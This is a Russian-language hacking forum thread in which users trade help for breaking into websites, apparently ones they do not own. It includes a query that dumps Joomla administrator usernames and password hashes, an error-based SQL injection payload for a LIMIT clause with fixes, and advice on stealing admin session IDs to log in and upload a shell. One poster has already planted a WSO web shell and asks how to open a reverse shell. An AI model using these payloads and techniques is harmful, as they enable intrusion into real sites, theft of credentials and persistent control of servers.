Старый 28.09.2014, 21:13   #3301
Panic
 
Регистрация: 24.09.2010
Сообщений: 26
Репутация: 1
По умолчанию

Ravenous, там many to many:
Код:
SELECT concat_ws(0x3a,username,password)
FROM `j6iw1_user_usergroup_map` inner join `j6iw1_users` on `j6iw1_user_usergroup_map`.user_id=`j6iw1_users`.id
WHERE group_id in (6,7,8)
GROUP BY user_id;
где
6 - Manager;
7 - Administrator;
8 - Super Administrator;

Последний раз редактировалось Panic; 28.09.2014 в 21:21..
Panic вне форума   Ответить с цитированием
Старый 02.10.2014, 20:10   #3302
Izz
 
Регистрация: 24.03.2014
Сообщений: 3
Репутация: 0
По умолчанию

Есть ли варианты проэксплуатировать после ORDER by и LIMIT?:

SELECT n.*, DATE_FORMAT(n.time, "%d.%m.%Y") as date FROM `articles` n WHERE n.public=1 AND n.type_id='2' AND n.time>='2011-01-01' AND n.time<'2012-01-01' ORDER by n.time DESC LIMIT injectparam,1000
Izz вне форума   Ответить с цитированием
Старый 02.10.2014, 21:35   #3303
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Izz Посмотреть сообщение
Есть ли варианты проэксплуатировать после ORDER by и LIMIT?:

SELECT n.*, DATE_FORMAT(n.time, "%d.%m.%Y") as date FROM `articles` n WHERE n.public=1 AND n.type_id='2' AND n.time>='2011-01-01' AND n.time<'2012-01-01' ORDER by n.time DESC LIMIT injectparam,1000
1,1 procedure analyse(0,updatexml(1,concat(0xa,version()),1))#
spari вне форума   Ответить с цитированием
Старый 03.10.2014, 05:23   #3304
Izz
 
Регистрация: 24.03.2014
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от spari Посмотреть сообщение
1,1 procedure analyse(0,updatexml(1,concat(0xa,version()),1))#
Спс за ответ, но у меня не проходит


A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0,updatexml(1,concat(0x3a,version()),1)) -- -,1' at line 1

SELECT n.*, DATE_FORMAT(n.time, "%d.%m.%Y") as date FROM `articles` n WHERE n.public=1 AND n.type_id='2' AND n.time>='2014-01-01' AND n.time<'2015-01-01' ORDER by n.time DESC LIMIT 1,1 procedure analyse (0,updatexml(1,concat(0x3a,version()),1)) -- -,1000
Izz вне форума   Ответить с цитированием
Старый 03.10.2014, 22:37   #3305
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от Izz Посмотреть сообщение
Спс за ответ, но у меня не проходит


A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0,updatexml(1,concat(0x3a,version()),1)) -- -,1' at line 1

SELECT n.*, DATE_FORMAT(n.time, "%d.%m.%Y") as date FROM `articles` n WHERE n.public=1 AND n.type_id='2' AND n.time>='2014-01-01' AND n.time<'2015-01-01' ORDER by n.time DESC LIMIT 1,1 procedure analyse (0,updatexml(1,concat(0x3a,version()),1)) -- -,1000
попробуйте убрать пробел перед (0,updatexml(1,concat(0x3a,version()),1)) -- -
omen666 вне форума   Ответить с цитированием
Старый 07.10.2014, 20:02   #3306
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Ребят,можно ли обойти rsfirewall в джумле?
Стоит backend-password на админку.Есть скуля,но md5-хэш этого пасса не сбрутился.
Возможно ли в куках передать этот хэш или,может быть,в бд где-то хранятся сессии админов?
QaRTiN вне форума   Ответить с цитированием
Старый 11.10.2014, 19:28   #3307
smerch
 
Регистрация: 20.01.2011
Сообщений: 21
Репутация: 6
По умолчанию

доброго всем дня, требуется помощь спецов.
залил wso, в Server security information это:
Цитата:
Server software: Apache/2.2.15 (CentOS)
Loaded Apache modules: core, prefork, http_core, mod_so, mod_auth_basic, mod_auth_digest, mod_authn_file, mod_authn_alias, mod_authn_anon, mod_authn_dbm, mod_authn_default, mod_authz_host, mod_authz_user, mod_authz_owner, mod_authz_groupfile, mod_authz_dbm, mod_authz_default, util_ldap, mod_authnz_ldap, mod_include, mod_log_config, mod_logio, mod_env, mod_ext_filter, mod_mime_magic, mod_expires, mod_deflate, mod_headers, mod_usertrack, mod_setenvif, mod_mime, mod_dav, mod_status, mod_autoindex, mod_info, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_actions, mod_speling, mod_userdir, mod_alias, mod_substitute, mod_rewrite, mod_proxy, mod_proxy_balancer, mod_proxy_ftp, mod_proxy_http, mod_proxy_ajp, mod_proxy_connect, mod_cache, mod_suexec, mod_disk_cache, mod_cgi, mod_version, mod_php5, mod_ispmgr
Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen
Open base dir: /var/www/admin/data:.
cURL support: enabled
Supported databases: MySql (5.1.73)

Readable /etc/passwd: no
Readable /etc/shadow: no
попробовал пару бекконектов, оба юзают system, соответственно не работают =(
в моем случае есть еще возможности получить бекконнект?
Заранее благодарен.
smerch вне форума   Ответить с цитированием
Старый 11.10.2014, 21:08   #3308
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

smerch: SSI, perl, python пробовали?
devv вне форума   Ответить с цитированием
Старый 12.10.2014, 08:14   #3309
smerch
 
Регистрация: 20.01.2011
Сообщений: 21
Репутация: 6
По умолчанию

консоль даже в wso не работает,
Цитата:
SSI, perl, python
их получится заюзать в таком случае?
PS попробовал 12309 шелл, перла на хосте нет, питона тоже, SSI тоже не заработал =(

Последний раз редактировалось smerch; 12.10.2014 в 09:25..
smerch вне форума   Ответить с цитированием
Старый 19.10.2014, 02:04   #3310
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от QaRTiN Посмотреть сообщение
Ребят,можно ли обойти rsfirewall в джумле?
Стоит backend-password на админку.Есть скуля,но md5-хэш этого пасса не сбрутился.
Возможно ли в куках передать этот хэш или,может быть,в бд где-то хранятся сессии админов?
Конечно хранятся и можно авторизироваться под аминов и залить свой шелл . Доставать данные с #__session например так concat_ws(0x3a,username,userid,client_id,session_i d)
кстате группы пользователей вот человек написал по делу
omen666 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot